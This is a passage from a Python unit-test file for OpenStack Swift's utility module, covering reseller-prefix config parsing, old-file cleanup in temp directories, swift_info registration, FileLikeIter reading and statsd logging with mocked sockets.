conf = {'reseller_prefix': 'AUTH', 'operator_roles': 'admin, swiftoperator'} prefixes, options = utils.config_read_reseller_options( conf, self.default_rules) self.assertEqual(prefixes, ['AUTH_']) self.assertEqual(options['AUTH_'], self.default_rules) def test_single_blank_reseller(self): conf = {'reseller_prefix': ''} prefixes, options = utils.config_read_reseller_options( conf, self.default_rules) self.assertEqual(prefixes, ['']) self.assertEqual(options[''], self.default_rules) def test_single_blank_reseller_with_conf(self): conf = {'reseller_prefix': '', "''operator_roles": 'role1, role2'} prefixes, options = utils.config_read_reseller_options( conf, self.default_rules) self.assertEqual(prefixes, ['']) self.assertEqual(options[''].get('operator_roles'), ['role1', 'role2']) self.assertEqual(options[''].get('service_roles'), self.default_rules.get('service_roles')) self.assertEqual(options[''].get('require_group'), self.default_rules.get('require_group')) def test_multiple_same_resellers(self): conf 
= {'reseller_prefix': " '' , '' "} prefixes, options = utils.config_read_reseller_options( conf, self.default_rules) self.assertEqual(prefixes, ['']) conf = {'reseller_prefix': '_, _'} prefixes, options = utils.config_read_reseller_options( conf, self.default_rules) self.assertEqual(prefixes, ['_']) conf = {'reseller_prefix': 'AUTH, PRE2, AUTH, PRE2'} prefixes, options = utils.config_read_reseller_options( conf, self.default_rules) self.assertEqual(prefixes, ['AUTH_', 'PRE2_']) def test_several_resellers_with_conf(self): conf = {'reseller_prefix': 'PRE1, PRE2', 'PRE1_operator_roles': 'role1, role2', 'PRE1_service_roles': 'role3, role4', 'PRE2_operator_roles': 'role5', 'PRE2_service_roles': 'role6', 'PRE2_require_group': 'pre2_group'} prefixes, options = utils.config_read_reseller_options( conf, self.default_rules) self.assertEqual(prefixes, ['PRE1_', 'PRE2_']) self.assertEqual(set(['role1', 'role2']), set(options['PRE1_'].get('operator_roles'))) self.assertEqual(['role5'], options['PRE2_'].get('operator_roles')) self.assertEqual(set(['role3', 'role4']), set(options['PRE1_'].get('service_roles'))) self.assertEqual(['role6'], options['PRE2_'].get('service_roles')) self.assertEqual('', options['PRE1_'].get('require_group')) self.assertEqual('pre2_group', options['PRE2_'].get('require_group')) def test_several_resellers_first_blank(self): conf = {'reseller_prefix': " '' , PRE2", "''operator_roles": 'role1, role2', "''service_roles": 'role3, role4', 'PRE2_operator_roles': 'role5', 'PRE2_service_roles': 'role6', 'PRE2_require_group': 'pre2_group'} prefixes, options = utils.config_read_reseller_options( conf, self.default_rules) self.assertEqual(prefixes, ['', 'PRE2_']) self.assertEqual(set(['role1', 'role2']), set(options[''].get('operator_roles'))) self.assertEqual(['role5'], options['PRE2_'].get('operator_roles')) self.assertEqual(set(['role3', 'role4']), set(options[''].get('service_roles'))) self.assertEqual(['role6'], options['PRE2_'].get('service_roles')) self.assertEqual('', options[''].get('require_group')) self.assertEqual('pre2_group', options['PRE2_'].get('require_group')) def test_several_resellers_with_blank_comma(self): conf = {'reseller_prefix': "AUTH , '', PRE2", "''operator_roles": 'role1, role2', "''service_roles": 'role3, role4', 'PRE2_operator_roles': 'role5', 'PRE2_service_roles': 'role6', 'PRE2_require_group': 'pre2_group'} prefixes, options = utils.config_read_reseller_options( conf, self.default_rules) self.assertEqual(prefixes, ['AUTH_', '', 'PRE2_']) self.assertEqual(set(['admin', 'swiftoperator']), set(options['AUTH_'].get('operator_roles'))) self.assertEqual(set(['role1', 'role2']), set(options[''].get('operator_roles'))) self.assertEqual(['role5'], options['PRE2_'].get('operator_roles')) self.assertEqual([], options['AUTH_'].get('service_roles')) self.assertEqual(set(['role3', 'role4']), set(options[''].get('service_roles'))) self.assertEqual(['role6'], options['PRE2_'].get('service_roles')) self.assertEqual('', options['AUTH_'].get('require_group')) self.assertEqual('', options[''].get('require_group')) self.assertEqual('pre2_group', options['PRE2_'].get('require_group')) def test_stray_comma(self): conf = {'reseller_prefix': "AUTH ,, PRE2", "''operator_roles": 'role1, role2', "''service_roles": 'role3, role4', 'PRE2_operator_roles': 'role5', 'PRE2_service_roles': 'role6', 'PRE2_require_group': 'pre2_group'} prefixes, options = utils.config_read_reseller_options( conf, self.default_rules) self.assertEqual(prefixes, ['AUTH_', 'PRE2_']) self.assertEqual(set(['admin', 
'swiftoperator']), set(options['AUTH_'].get('operator_roles'))) self.assertEqual(['role5'], options['PRE2_'].get('operator_roles')) self.assertEqual([], options['AUTH_'].get('service_roles')) self.assertEqual(['role6'], options['PRE2_'].get('service_roles')) self.assertEqual('', options['AUTH_'].get('require_group')) self.assertEqual('pre2_group', options['PRE2_'].get('require_group')) def test_multiple_stray_commas_resellers(self): conf = {'reseller_prefix': ' , , ,'} prefixes, options = utils.config_read_reseller_options( conf, self.default_rules) self.assertEqual(prefixes, ['']) self.assertEqual(options[''], self.default_rules) def test_unprefixed_options(self): conf = {'reseller_prefix': "AUTH , '', PRE2", "operator_roles": 'role1, role2', "service_roles": 'role3, role4', 'require_group': 'auth_blank_group', 'PRE2_operator_roles': 'role5', 'PRE2_service_roles': 'role6', 'PRE2_require_group': 'pre2_group'} prefixes, options = utils.config_read_reseller_options( conf, self.default_rules) self.assertEqual(prefixes, ['AUTH_', '', 'PRE2_']) self.assertEqual(set(['role1', 'role2']), set(options['AUTH_'].get('operator_roles'))) self.assertEqual(set(['role1', 'role2']), set(options[''].get('operator_roles'))) self.assertEqual(['role5'], options['PRE2_'].get('operator_roles')) self.assertEqual(set(['role3', 'role4']), set(options['AUTH_'].get('service_roles'))) self.assertEqual(set(['role3', 'role4']), set(options[''].get('service_roles'))) self.assertEqual(['role6'], options['PRE2_'].get('service_roles')) self.assertEqual('auth_blank_group', options['AUTH_'].get('require_group')) self.assertEqual('auth_blank_group', options[''].get('require_group')) self.assertEqual('pre2_group', options['PRE2_'].get('require_group')) class TestUnlinkOlder(unittest.TestCase): def setUp(self): self.tempdir = mkdtemp() self.mtime = {} self.ts = make_timestamp_iter() def tearDown(self): rmtree(self.tempdir, ignore_errors=True) def touch(self, fpath, mtime=None): self.mtime[fpath] = mtime or next(self.ts) open(fpath, 'w') @contextlib.contextmanager def high_resolution_getmtime(self): orig_getmtime = os.path.getmtime def mock_getmtime(fpath): mtime = self.mtime.get(fpath) if mtime is None: mtime = orig_getmtime(fpath) return mtime with mock.patch('os.path.getmtime', mock_getmtime): yield def test_unlink_older_than_path_not_exists(self): path = os.path.join(self.tempdir, 'does-not-exist') # just make sure it doesn't blow up utils.unlink_older_than(path, next(self.ts)) def test_unlink_older_than_file(self): path = os.path.join(self.tempdir, 'some-file') self.touch(path) with self.assertRaises(OSError) as ctx: utils.unlink_older_than(path, next(self.ts)) self.assertEqual(ctx.exception.errno, errno.ENOTDIR) def test_unlink_older_than_now(self): self.touch(os.path.join(self.tempdir, 'test')) with self.high_resolution_getmtime(): utils.unlink_older_than(self.tempdir, next(self.ts)) self.assertEqual([], os.listdir(self.tempdir)) def test_unlink_not_old_enough(self): start = next(self.ts) self.touch(os.path.join(self.tempdir, 'test')) with self.high_resolution_getmtime(): utils.unlink_older_than(self.tempdir, start) self.assertEqual(['test'], os.listdir(self.tempdir)) def test_unlink_mixed(self): self.touch(os.path.join(self.tempdir, 'first')) cutoff = next(self.ts) self.touch(os.path.join(self.tempdir, 'second')) with self.high_resolution_getmtime(): utils.unlink_older_than(self.tempdir, cutoff) self.assertEqual(['second'], os.listdir(self.tempdir)) def test_unlink_paths(self): paths = [] for item in ('first', 'second', 
'third'): path = os.path.join(self.tempdir, item) self.touch(path) paths.append(path) # don't unlink everyone with self.high_resolution_getmtime(): utils.unlink_paths_older_than(paths[:2], next(self.ts)) self.assertEqual(['third'], os.listdir(self.tempdir)) def test_unlink_empty_paths(self): # just make sure it doesn't blow up utils.unlink_paths_older_than([], next(self.ts)) def test_unlink_not_exists_paths(self): path = os.path.join(self.tempdir, 'does-not-exist') # just make sure it doesn't blow up utils.unlink_paths_older_than([path], next(self.ts)) class TestSwiftInfo(unittest.TestCase): def tearDown(self): utils._swift_info = {} utils._swift_admin_info = {} def test_register_swift_info(self): utils.register_swift_info(foo='bar') utils.register_swift_info(lorem='ipsum') utils.register_swift_info('cap1', cap1_foo='cap1_bar') utils.register_swift_info('cap1', cap1_lorem='cap1_ipsum') self.assertTrue('swift' in utils._swift_info) self.assertTrue('foo' in utils._swift_info['swift']) self.assertEqual(utils._swift_info['swift']['foo'], 'bar') self.assertTrue('lorem' in utils._swift_info['swift']) self.assertEqual(utils._swift_info['swift']['lorem'], 'ipsum') self.assertTrue('cap1' in utils._swift_info) self.assertTrue('cap1_foo' in utils._swift_info['cap1']) self.assertEqual(utils._swift_info['cap1']['cap1_foo'], 'cap1_bar') self.assertTrue('cap1_lorem' in utils._swift_info['cap1']) self.assertEqual(utils._swift_info['cap1']['cap1_lorem'], 'cap1_ipsum') self.assertRaises(ValueError, utils.register_swift_info, 'admin', foo='bar') self.assertRaises(ValueError, utils.register_swift_info, 'disallowed_sections', disallowed_sections=None) utils.register_swift_info('goodkey', foo='5.6') self.assertRaises(ValueError, utils.register_swift_info, 'bad.key', foo='5.6') data = {'bad.key': '5.6'} self.assertRaises(ValueError, utils.register_swift_info, 'goodkey', **data) def test_get_swift_info(self): utils._swift_info = {'swift': {'foo': 'bar'}, 'cap1': {'cap1_foo': 'cap1_bar'}} utils._swift_admin_info = {'admin_cap1': {'ac1_foo': 'ac1_bar'}} info = utils.get_swift_info() self.assertNotIn('admin', info) self.assertIn('swift', info) self.assertIn('foo', info['swift']) self.assertEqual(utils._swift_info['swift']['foo'], 'bar') self.assertIn('cap1', info) self.assertIn('cap1_foo', info['cap1']) self.assertEqual(utils._swift_info['cap1']['cap1_foo'], 'cap1_bar') def test_get_swift_info_with_disallowed_sections(self): utils._swift_info = {'swift': {'foo': 'bar'}, 'cap1': {'cap1_foo': 'cap1_bar'}, 'cap2': {'cap2_foo': 'cap2_bar'}, 'cap3': {'cap3_foo': 'cap3_bar'}} utils._swift_admin_info = {'admin_cap1': {'ac1_foo': 'ac1_bar'}} info = utils.get_swift_info(disallowed_sections=['cap1', 'cap3']) self.assertNotIn('admin', info) self.assertIn('swift', info) self.assertIn('foo', info['swift']) self.assertEqual(info['swift']['foo'], 'bar') self.assertNotIn('cap1', info) self.assertIn('cap2', info) self.assertIn('cap2_foo', info['cap2']) self.assertEqual(info['cap2']['cap2_foo'], 'cap2_bar') self.assertNotIn('cap3', info) def test_register_swift_admin_info(self): utils.register_swift_info(admin=True, admin_foo='admin_bar') utils.register_swift_info(admin=True, admin_lorem='admin_ipsum') utils.register_swift_info('cap1', admin=True, ac1_foo='ac1_bar') utils.register_swift_info('cap1', admin=True, ac1_lorem='ac1_ipsum') self.assertIn('swift', utils._swift_admin_info) self.assertIn('admin_foo', utils._swift_admin_info['swift']) self.assertEqual( utils._swift_admin_info['swift']['admin_foo'], 'admin_bar') 
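        # Everything registered with admin=True should show up only in
        # utils._swift_admin_info; the assertions below also confirm that
        # nothing leaked into utils._swift_info.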
self.assertIn('admin_lorem', utils._swift_admin_info['swift']) self.assertEqual( utils._swift_admin_info['swift']['admin_lorem'], 'admin_ipsum') self.assertIn('cap1', utils._swift_admin_info) self.assertIn('ac1_foo', utils._swift_admin_info['cap1']) self.assertEqual( utils._swift_admin_info['cap1']['ac1_foo'], 'ac1_bar') self.assertIn('ac1_lorem', utils._swift_admin_info['cap1']) self.assertEqual( utils._swift_admin_info['cap1']['ac1_lorem'], 'ac1_ipsum') self.assertNotIn('swift', utils._swift_info) self.assertNotIn('cap1', utils._swift_info) def test_get_swift_admin_info(self): utils._swift_info = {'swift': {'foo': 'bar'}, 'cap1': {'cap1_foo': 'cap1_bar'}} utils._swift_admin_info = {'admin_cap1': {'ac1_foo': 'ac1_bar'}} info = utils.get_swift_info(admin=True) self.assertIn('admin', info) self.assertIn('admin_cap1', info['admin']) self.assertIn('ac1_foo', info['admin']['admin_cap1']) self.assertEqual(info['admin']['admin_cap1']['ac1_foo'], 'ac1_bar') self.assertIn('swift', info) self.assertIn('foo', info['swift']) self.assertEqual(utils._swift_info['swift']['foo'], 'bar') self.assertIn('cap1', info) self.assertIn('cap1_foo', info['cap1']) self.assertEqual(utils._swift_info['cap1']['cap1_foo'], 'cap1_bar') def test_get_swift_admin_info_with_disallowed_sections(self): utils._swift_info = {'swift': {'foo': 'bar'}, 'cap1': {'cap1_foo': 'cap1_bar'}, 'cap2': {'cap2_foo': 'cap2_bar'}, 'cap3': {'cap3_foo': 'cap3_bar'}} utils._swift_admin_info = {'admin_cap1': {'ac1_foo': 'ac1_bar'}} info = utils.get_swift_info( admin=True, disallowed_sections=['cap1', 'cap3']) self.assertIn('admin', info) self.assertIn('admin_cap1', info['admin']) self.assertIn('ac1_foo', info['admin']['admin_cap1']) self.assertEqual(info['admin']['admin_cap1']['ac1_foo'], 'ac1_bar') self.assertIn('disallowed_sections', info['admin']) self.assertIn('cap1', info['admin']['disallowed_sections']) self.assertNotIn('cap2', info['admin']['disallowed_sections']) self.assertIn('cap3', info['admin']['disallowed_sections']) self.assertIn('swift', info) self.assertIn('foo', info['swift']) self.assertEqual(info['swift']['foo'], 'bar') self.assertNotIn('cap1', info) self.assertIn('cap2', info) self.assertIn('cap2_foo', info['cap2']) self.assertEqual(info['cap2']['cap2_foo'], 'cap2_bar') self.assertNotIn('cap3', info) def test_get_swift_admin_info_with_disallowed_sub_sections(self): utils._swift_info = {'swift': {'foo': 'bar'}, 'cap1': {'cap1_foo': 'cap1_bar', 'cap1_moo': 'cap1_baa'}, 'cap2': {'cap2_foo': 'cap2_bar'}, 'cap3': {'cap2_foo': 'cap2_bar'}, 'cap4': {'a': {'b': {'c': 'c'}, 'b.c': 'b.c'}}} utils._swift_admin_info = {'admin_cap1': {'ac1_foo': 'ac1_bar'}} info = utils.get_swift_info( admin=True, disallowed_sections=['cap1.cap1_foo', 'cap3', 'cap4.a.b.c']) self.assertNotIn('cap3', info) self.assertEqual(info['cap1']['cap1_moo'], 'cap1_baa') self.assertNotIn('cap1_foo', info['cap1']) self.assertNotIn('c', info['cap4']['a']['b']) self.assertEqual(info['cap4']['a']['b.c'], 'b.c') def test_get_swift_info_with_unmatched_disallowed_sections(self): cap1 = {'cap1_foo': 'cap1_bar', 'cap1_moo': 'cap1_baa'} utils._swift_info = {'swift': {'foo': 'bar'}, 'cap1': cap1} # expect no exceptions info = utils.get_swift_info( disallowed_sections=['cap2.cap1_foo', 'cap1.no_match', 'cap1.cap1_foo.no_match.no_match']) self.assertEqual(info['cap1'], cap1) class TestFileLikeIter(unittest.TestCase): def test_iter_file_iter(self): in_iter = [b'abc', b'de', b'fghijk', b'l'] chunks = [] for chunk in utils.FileLikeIter(in_iter): chunks.append(chunk) 
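        # Iterating a FileLikeIter should yield the wrapped chunks unchanged,
        # so the collected chunks must match the input exactly.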
self.assertEqual(chunks, in_iter) def test_next(self): in_iter = [b'abc', b'de', b'fghijk', b'l'] chunks = [] iter_file = utils.FileLikeIter(in_iter) while True: try: chunk = next(iter_file) except StopIteration: break chunks.append(chunk) self.assertEqual(chunks, in_iter) def test_read(self): in_iter = [b'abc', b'de', b'fghijk', b'l'] iter_file = utils.FileLikeIter(in_iter) self.assertEqual(iter_file.read(), b''.join(in_iter)) def test_read_with_size(self): in_iter = [b'abc', b'de', b'fghijk', b'l'] chunks = [] iter_file = utils.FileLikeIter(in_iter) while True: chunk = iter_file.read(2) if not chunk: break self.assertTrue(len(chunk) <= 2) chunks.append(chunk) self.assertEqual(b''.join(chunks), b''.join(in_iter)) def test_read_with_size_zero(self): # makes little sense, but file supports it, so... self.assertEqual(utils.FileLikeIter(b'abc').read(0), b'') def test_readline(self): in_iter = [b'abc\n', b'd', b'\nef', b'g\nh', b'\nij\n\nk\n', b'trailing.'] lines = [] iter_file = utils.FileLikeIter(in_iter) while True: line = iter_file.readline() if not line: break lines.append(line) self.assertEqual( lines, [v if v == b'trailing.' else v + b'\n' for v in b''.join(in_iter).split(b'\n')]) def test_readline2(self): self.assertEqual( utils.FileLikeIter([b'abc', b'def\n']).readline(4), b'abcd') def test_readline3(self): self.assertEqual( utils.FileLikeIter([b'a' * 1111, b'bc\ndef']).readline(), (b'a' * 1111) + b'bc\n') def test_readline_with_size(self): in_iter = [b'abc\n', b'd', b'\nef', b'g\nh', b'\nij\n\nk\n', b'trailing.'] lines = [] iter_file = utils.FileLikeIter(in_iter) while True: line = iter_file.readline(2) if not line: break lines.append(line) self.assertEqual( lines, [b'ab', b'c\n', b'd\n', b'ef', b'g\n', b'h\n', b'ij', b'\n', b'\n', b'k\n', b'tr', b'ai', b'li', b'ng', b'.']) def test_readlines(self): in_iter = [b'abc\n', b'd', b'\nef', b'g\nh', b'\nij\n\nk\n', b'trailing.'] lines = utils.FileLikeIter(in_iter).readlines() self.assertEqual( lines, [v if v == b'trailing.' 
else v + b'\n' for v in b''.join(in_iter).split(b'\n')]) def test_readlines_with_size(self): in_iter = [b'abc\n', b'd', b'\nef', b'g\nh', b'\nij\n\nk\n', b'trailing.'] iter_file = utils.FileLikeIter(in_iter) lists_of_lines = [] while True: lines = iter_file.readlines(2) if not lines: break lists_of_lines.append(lines) self.assertEqual( lists_of_lines, [[b'ab'], [b'c\n'], [b'd\n'], [b'ef'], [b'g\n'], [b'h\n'], [b'ij'], [b'\n', b'\n'], [b'k\n'], [b'tr'], [b'ai'], [b'li'], [b'ng'], [b'.']]) def test_close(self): iter_file = utils.FileLikeIter([b'a', b'b', b'c']) self.assertEqual(next(iter_file), b'a') iter_file.close() self.assertTrue(iter_file.closed) self.assertRaises(ValueError, iter_file.next) self.assertRaises(ValueError, iter_file.read) self.assertRaises(ValueError, iter_file.readline) self.assertRaises(ValueError, iter_file.readlines) # Just make sure repeated close calls don't raise an Exception iter_file.close() self.assertTrue(iter_file.closed) def test_get_hub(self): # This test mock the eventlet.green.select module without poll # as in eventlet > 0.20 # https://github.com/eventlet/eventlet/commit/614a20462 # We add __original_module_select to sys.modules to mock usage # of eventlet.patcher.original class SelectWithPoll(object): def poll(): pass class SelectWithoutPoll(object): pass # Platform with poll() that call get_hub before eventlet patching with mock.patch.dict('sys.modules', {'select': SelectWithPoll, '__original_module_select': SelectWithPoll}): self.assertEqual(utils.get_hub(), 'poll') # Platform with poll() that call get_hub after eventlet patching with mock.patch.dict('sys.modules', {'select': SelectWithoutPoll, '__original_module_select': SelectWithPoll}): self.assertEqual(utils.get_hub(), 'poll') # Platform without poll() -- before or after patching doesn't matter with mock.patch.dict('sys.modules', {'select': SelectWithoutPoll, '__original_module_select': SelectWithoutPoll}): self.assertEqual(utils.get_hub(), 'selects') class TestStatsdLogging(unittest.TestCase): def setUp(self): def fake_getaddrinfo(host, port, *args): # this is what a real getaddrinfo('localhost', port, # socket.AF_INET) returned once return [(socket.AF_INET, # address family socket.SOCK_STREAM, # socket type socket.IPPROTO_TCP, # socket protocol '', # canonical name, ('127.0.0.1', port)), # socket address (socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP, '', ('127.0.0.1', port))] self.real_getaddrinfo = utils.socket.getaddrinfo self.getaddrinfo_patcher = mock.patch.object( utils.socket, 'getaddrinfo', fake_getaddrinfo) self.mock_getaddrinfo = self.getaddrinfo_patcher.start() self.addCleanup(self.getaddrinfo_patcher.stop) def test_get_logger_statsd_client_not_specified(self): logger = utils.get_logger({}, 'some-name', log_route='some-route') # white-box construction validation self.assertIsNone(logger.logger.statsd_client) def test_get_logger_statsd_client_defaults(self): logger = utils.get_logger({'log_statsd_host': 'some.host.com'}, 'some-name', log_route='some-route') # white-box construction validation self.assertTrue(isinstance(logger.logger.statsd_client, utils.StatsdClient)) self.assertEqual(logger.logger.statsd_client._host, 'some.host.com') self.assertEqual(logger.logger.statsd_client._port, 8125) self.assertEqual(logger.logger.statsd_client._prefix, 'some-name.') self.assertEqual(logger.logger.statsd_client._default_sample_rate, 1) logger.set_statsd_prefix('some-name.more-specific') self.assertEqual(logger.logger.statsd_client._prefix, 'some-name.more-specific.') 
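        # For reference, the prefix strings asserted in these statsd tests are
        # the leading part of the plain-text StatsD datagram. A minimal sketch
        # of that line format (the helper name fmt_statsd_line is illustrative
        # only, not a swift.common.utils API):
        #
        #     def fmt_statsd_line(prefix, metric, value, type_char,
        #                         sample_rate=1):
        #         line = '%s%s:%s|%s' % (prefix, metric, value, type_char)
        #         if sample_rate < 1:
        #             line += '|@%s' % sample_rate
        #         return line
        #
        #     fmt_statsd_line('pfx.', 'some.counter', 1, 'c', 0.972)
        #     # -> 'pfx.some.counter:1|c|@0.972'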
        logger.set_statsd_prefix('')
        self.assertEqual(logger.logger.statsd_client._prefix, '')

    def test_get_logger_statsd_client_non_defaults(self):
        logger = utils.get_logger({
            'log_statsd_host': 'another.host.com',
            'log_statsd_port': '9876',
            'log_statsd_default_sample_rate': '0.75',
            'log_statsd_sample_rate_factor': '0.81',
            'log_statsd_metric_prefix': 'tomato.sauce',
        }, 'some-name', log_route='some-route')
        self.assertEqual(logger.logger.statsd_client._prefix,
                         'tomato.sauce.some-name.')
        logger.set_statsd_prefix('some-name.more-specific')
        self.assertEqual(logger.logger.statsd_client._prefix,
                         'tomato.sauce.some-name.more-specific.')
        logger.set_statsd_prefix('')
        self.assertEqual(logger.logger.statsd_client._prefix, 'tomato.sauce.')
        self.assertEqual(logger.logger.statsd_client._host, 'another.host.com')
        self.assertEqual(logger.logger.statsd_client._port, 9876)
        self.assertEqual(logger.logger.statsd_client._default_sample_rate,
                         0.75)
        self.assertEqual(logger.logger.statsd_client._sample_rate_factor,
                         0.81)

    def test_ipv4_or_ipv6_hostname_defaults_to_ipv4(self):
        def stub_getaddrinfo_both_ipv4_and_ipv6(host, port, family, *rest):
            if family == socket.AF_INET:
                return [(socket.AF_INET, 'blah', 'blah', 'blah',
                         ('127.0.0.1', int(port)))]
            elif family == socket.AF_INET6:
                # Implemented so an incorrectly ordered implementation (IPv6
                # then IPv4) would realistically fail.
                return [(socket.AF_INET6, 'blah', 'blah', 'blah',
                         ('::1', int(port), 0, 0))]

        with mock.patch.object(utils.socket, 'getaddrinfo',
                               new=stub_getaddrinfo_both_ipv4_and_ipv6):
            logger = utils.get_logger({
                'log_statsd_host': 'localhost',
                'log_statsd_port': '9876',
            }, 'some-name', log_route='some-route')
        statsd_client = logger.logger.statsd_client

        self.assertEqual(statsd_client._sock_family, socket.AF_INET)
        self.assertEqual(statsd_client._target, ('localhost', 9876))

        got_sock = statsd_client._open_socket()
        self.assertEqual(got_sock.family, socket.AF_INET)

    def test_ipv4_instantiation_and_socket_creation(self):
        logger = utils.get_logger({
            'log_statsd_host': '127.0.0.1',
            'log_statsd_port': '9876',
        }, 'some-name', log_route='some-route')
        statsd_client = logger.logger.statsd_client

        self.assertEqual(statsd_client._sock_family, socket.AF_INET)
        self.assertEqual(statsd_client._target, ('127.0.0.1', 9876))

        got_sock = statsd_client._open_socket()
        self.assertEqual(got_sock.family, socket.AF_INET)

    def test_ipv6_instantiation_and_socket_creation(self):
        # We have to check the given hostname or IP for IPv4/IPv6 on logger
        # instantiation so we don't call getaddrinfo() too often and don't
        # have to call bind() on our socket to detect IPv4/IPv6 on every
        # send.
        #
        # This test uses the real getaddrinfo, so we patch over the mock to
        # put the real one back. If we just stop the mock, then
        # unittest.exit() blows up, but stacking real-fake-real works okay.
with mock.patch.object(utils.socket, 'getaddrinfo', self.real_getaddrinfo): logger = utils.get_logger({ 'log_statsd_host': '::1', 'log_statsd_port': '9876', }, 'some-name', log_route='some-route') statsd_client = logger.logger.statsd_client self.assertEqual(statsd_client._sock_family, socket.AF_INET6) self.assertEqual(statsd_client._target, ('::1', 9876, 0, 0)) got_sock = statsd_client._open_socket() self.assertEqual(got_sock.family, socket.AF_INET6) def test_bad_hostname_instantiation(self): with mock.patch.object(utils.socket, 'getaddrinfo', side_effect=utils.socket.gaierror("whoops")): logger = utils.get_logger({ 'log_statsd_host': 'i-am-not-a-hostname-or-ip', 'log_statsd_port': '9876', }, 'some-name', log_route='some-route') statsd_client = logger.logger.statsd_client self.assertEqual(statsd_client._sock_family, socket.AF_INET) self.assertEqual(statsd_client._target, ('i-am-not-a-hostname-or-ip', 9876)) got_sock = statsd_client._open_socket() self.assertEqual(got_sock.family, socket.AF_INET) # Maybe the DNS server gets fixed in a bit and it starts working... or # maybe the DNS record hadn't propagated yet. In any case, failed # statsd sends will warn in the logs until the DNS failure or invalid # IP address in the configuration is fixed. def test_sending_ipv6(self): def fake_getaddrinfo(host, port, *args): # this is what a real getaddrinfo('::1', port, # socket.AF_INET6) returned once return [(socket.AF_INET6, socket.SOCK_STREAM, socket.IPPROTO_TCP, '', ('::1', port, 0, 0)), (socket.AF_INET6, socket.SOCK_DGRAM, socket.IPPROTO_UDP, '', ('::1', port, 0, 0))] with mock.patch.object(utils.socket, 'getaddrinfo', fake_getaddrinfo): logger = utils.get_logger({ 'log_statsd_host': '::1', 'log_statsd_port': '9876', }, 'some-name', log_route='some-route') statsd_client = logger.logger.statsd_client fl = FakeLogger() statsd_client.logger = fl mock_socket = MockUdpSocket() statsd_client._open_socket = lambda *_: mock_socket logger.increment('tunafish') self.assertEqual(fl.get_lines_for_level('warning'), []) self.assertEqual(mock_socket.sent, [(b'some-name.tunafish:1|c', ('::1', 9876, 0, 0))]) def test_no_exception_when_cant_send_udp_packet(self): logger = utils.get_logger({'log_statsd_host': 'some.host.com'}) statsd_client = logger.logger.statsd_client fl = FakeLogger() statsd_client.logger = fl mock_socket = MockUdpSocket(sendto_errno=errno.EPERM) statsd_client._open_socket = lambda *_: mock_socket logger.increment('tunafish') expected = ["Error sending UDP message to ('some.host.com', 8125): " "[Errno 1] test errno 1"] self.assertEqual(fl.get_lines_for_level('warning'), expected) def test_sample_rates(self): logger = utils.get_logger({'log_statsd_host': 'some.host.com'}) mock_socket = MockUdpSocket() # encapsulation? what's that? statsd_client = logger.logger.statsd_client self.assertTrue(statsd_client.random is random.random) statsd_client._open_socket = lambda *_: mock_socket statsd_client.random = lambda: 0.50001 logger.increment('tribbles', sample_rate=0.5) self.assertEqual(len(mock_socket.sent), 0) statsd_client.random = lambda: 0.49999 logger.increment('tribbles', sample_rate=0.5) self.assertEqual(len(mock_socket.sent), 1) payload = mock_socket.sent[0][0] self.assertTrue(payload.endswith(b"|@0.5")) def test_sample_rates_with_sample_rate_factor(self): logger = utils.get_logger({ 'log_statsd_host': 'some.host.com', 'log_statsd_default_sample_rate': '0.82', 'log_statsd_sample_rate_factor': '0.91', }) effective_sample_rate = 0.82 * 0.91 mock_socket = MockUdpSocket() # encapsulation? 
what's that? statsd_client = logger.logger.statsd_client self.assertTrue(statsd_client.random is random.random) statsd_client._open_socket = lambda *_: mock_socket statsd_client.random = lambda: effective_sample_rate + 0.001 logger.increment('tribbles') self.assertEqual(len(mock_socket.sent), 0) statsd_client.random = lambda: effective_sample_rate - 0.001 logger.increment('tribbles') self.assertEqual(len(mock_socket.sent), 1) payload = mock_socket.sent[0][0] suffix = "|@%s" % effective_sample_rate if six.PY3: suffix = suffix.encode('utf-8') self.assertTrue(payload.endswith(suffix), payload) effective_sample_rate = 0.587 * 0.91 statsd_client.random = lambda: effective_sample_rate - 0.001 logger.increment('tribbles', sample_rate=0.587) self.assertEqual(len(mock_socket.sent), 2) payload = mock_socket.sent[1][0] suffix = "|@%s" % effective_sample_rate if six.PY3: suffix = suffix.encode('utf-8') self.assertTrue(payload.endswith(suffix), payload) def test_timing_stats(self): class MockController(object): def __init__(self, status): self.status = status self.logger = self self.args = () self.called = 'UNKNOWN' def timing_since(self, *args): self.called = 'timing' self.args = args @utils.timing_stats() def METHOD(controller): return Response(status=controller.status) mock_controller = MockController(200) METHOD(mock_controller) self.assertEqual(mock_controller.called, 'timing') self.assertEqual(len(mock_controller.args), 2) self.assertEqual(mock_controller.args[0], 'METHOD.timing') self.assertTrue(mock_controller.args[1] > 0) mock_controller = MockController(400) METHOD(mock_controller) self.assertEqual(len(mock_controller.args), 2) self.assertEqual(mock_controller.called, 'timing') self.assertEqual(mock_controller.args[0], 'METHOD.timing') self.assertTrue(mock_controller.args[1] > 0) mock_controller = MockController(404) METHOD(mock_controller) self.assertEqual(len(mock_controller.args), 2) self.assertEqual(mock_controller.called, 'timing') self.assertEqual(mock_controller.args[0], 'METHOD.timing') self.assertTrue(mock_controller.args[1] > 0) mock_controller = MockController(412) METHOD(mock_controller) self.assertEqual(len(mock_controller.args), 2) self.assertEqual(mock_controller.called, 'timing') self.assertEqual(mock_controller.args[0], 'METHOD.timing') self.assertTrue(mock_controller.args[1] > 0) mock_controller = MockController(416) METHOD(mock_controller) self.assertEqual(len(mock_controller.args), 2) self.assertEqual(mock_controller.called, 'timing') self.assertEqual(mock_controller.args[0], 'METHOD.timing') self.assertTrue(mock_controller.args[1] > 0) mock_controller = MockController(500) METHOD(mock_controller) self.assertEqual(len(mock_controller.args), 2) self.assertEqual(mock_controller.called, 'timing') self.assertEqual(mock_controller.args[0], 'METHOD.errors.timing') self.assertTrue(mock_controller.args[1] > 0) mock_controller = MockController(507) METHOD(mock_controller) self.assertEqual(len(mock_controller.args), 2) self.assertEqual(mock_controller.called, 'timing') self.assertEqual(mock_controller.args[0], 'METHOD.errors.timing') self.assertTrue(mock_controller.args[1] > 0) class UnsafeXrange(object): """ Like range(limit), but with extra context switching to screw things up. 
